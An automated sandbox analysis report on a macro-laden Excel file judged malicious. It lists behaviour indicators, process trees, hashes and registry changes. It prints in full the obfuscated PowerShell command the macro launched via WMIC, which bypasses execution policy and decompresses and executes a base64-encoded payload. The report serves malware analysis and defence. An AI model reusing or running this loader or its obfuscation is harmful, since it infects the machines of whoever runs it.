File name:

MIL0001537426.xls

Full analysis: https://app.any.run/tasks/dcd07c36-7b14-4296-a080-058f39a7b5ec
Verdict: Malicious activity
Analysis date: September 11, 2019, 07:30:47
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Sep 9 09:33:00 2019, Last Saved Time/Date: Mon Sep 9 09:37:00 2019, Security: 0
MD5:

F564E32039FD930A7688A7325B3EC5FB

SHA1:

2526A64145F814F8C1760A531F22DE3CF8F4A4CF

SHA256:

4BB516D3E5546A1EE287ABE9A2B6FA3FBEF3B6092A49EDF13D2BB19CC1C00850

SSDEEP:

1536:zP5HNfeQuP8mo1X9rlnSYYcMA+eIFAlYkRIbTkKBEqEXugsCZmbpoahZhC0cixI9:zP5HNfeQu8mo1X9rlnSYYcMA+eIFAlYu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Loads the Task Scheduler COM API

      • mmc.exe (PID: 4756)

    • Loads the Task Scheduler DLL interface

      • mmc.exe (PID: 4756)

  • SUSPICIOUS

    • Reads mouse settings

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Reads Environment values

      • EXCEL.EXE (PID: 5580)
      • powershell.exe (PID: 3404)
      • powershell.exe (PID: 2692)
      • powershell.exe (PID: 1948)
      • powershell.exe (PID: 5396)
      • POWeRsHEll.exe (PID: 556)
      • EXCEL.EXE (PID: 2736)
      • powershell.exe (PID: 580)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 5348)
      • powershell.exe (PID: 3420)
      • powershell.exe (PID: 1924)
      • POWeRsHEll.exe (PID: 2504)

    • PowerShell script executed

      • POWeRsHEll.exe (PID: 556)
      • POWeRsHEll.exe (PID: 2504)

    • Executes PowerShell scripts

      • POWeRsHEll.exe (PID: 556)
      • POWeRsHEll.exe (PID: 2504)

    • Executed via WMI

      • POWeRsHEll.exe (PID: 556)
      • POWeRsHEll.exe (PID: 2504)

    • Uses WMIC.EXE to create a new process

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Application launched itself

      • POWeRsHEll.exe (PID: 556)
      • POWeRsHEll.exe (PID: 2504)

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 1084)
      • powershell.exe (PID: 3404)
      • powershell.exe (PID: 1948)
      • powershell.exe (PID: 5396)
      • powershell.exe (PID: 2692)
      • cvtres.exe (PID: 4200)
      • powershell.exe (PID: 1924)
      • powershell.exe (PID: 5348)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 3420)
      • cvtres.exe (PID: 3740)
      • POWeRsHEll.exe (PID: 2504)
      • mmc.exe (PID: 4756)
      • csc.exe (PID: 1580)
      • powershell.exe (PID: 580)
      • csc.exe (PID: 5724)
      • POWeRsHEll.exe (PID: 556)

  • INFO

    • Reads settings of System Certificates

      • EXCEL.EXE (PID: 5580)
      • POWeRsHEll.exe (PID: 556)
      • powershell.exe (PID: 2692)
      • powershell.exe (PID: 1084)
      • powershell.exe (PID: 1948)
      • powershell.exe (PID: 3404)
      • powershell.exe (PID: 5396)
      • EXCEL.EXE (PID: 2736)
      • POWeRsHEll.exe (PID: 2504)
      • powershell.exe (PID: 580)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 1924)
      • powershell.exe (PID: 5348)
      • powershell.exe (PID: 3420)

    • Reads the machine GUID from the registry

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Reads the software policy settings

      • EXCEL.EXE (PID: 5580)
      • POWeRsHEll.exe (PID: 556)
      • powershell.exe (PID: 1084)
      • powershell.exe (PID: 3404)
      • powershell.exe (PID: 5396)
      • powershell.exe (PID: 1948)
      • powershell.exe (PID: 2692)
      • EXCEL.EXE (PID: 2736)
      • POWeRsHEll.exe (PID: 2504)
      • powershell.exe (PID: 580)
      • powershell.exe (PID: 3848)
      • powershell.exe (PID: 1924)
      • powershell.exe (PID: 5348)
      • powershell.exe (PID: 3420)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)

    • Manual execution by user

      • EXCEL.EXE (PID: 2736)
      • mmc.exe (PID: 4756)
      • mmc.exe (PID: 248)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 5580)
      • EXCEL.EXE (PID: 2736)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2019:09:09 08:33:00
ModifyDate: 2019:09:09 08:37:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: allegati
HeadingPairs:
  • Fogli di lavoro
  • 1
CompObjUserTypeLen: 41
CompObjUserType: Foglio di lavoro di Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
36
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe powershell.exe powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs conhost.exe no specs csc.exe no specs cvtres.exe no specs excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe powershell.exe powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs csc.exe no specs cvtres.exe no specs mmc.exe no specs mmc.exe

Process information

PID
CMD
Path
Indicators
Parent process
248"C:\WINDOWS\system32\mmc.exe" "C:\WINDOWS\system32\taskschd.msc" /sC:\WINDOWS\system32\mmc.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Management Console
Exit code:
3221226540
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll
452\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
POWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
556POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieXC:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
580"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4000
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
832\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1080\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1084"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4000
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
1580"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\qhtxu0wo.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exePOWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.7.2556.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\combase.dll
1924"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4000
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
1948"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWeRsHEll.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4000
Version:
10.0.16299.15 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
Total events
16 761
Read events
16 046
Write events
648
Delete events
67

Modification events

(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000BE4E402C04000000000000000400000000000000
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
1
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-IT
Value:
1
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
Operation:writeName:8l(
Value:
386C2800CC1500000100000000000000F3F2E4E77268D50100000000
(PID) Process:(5580) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
Operation:writeName:hl(
Value:
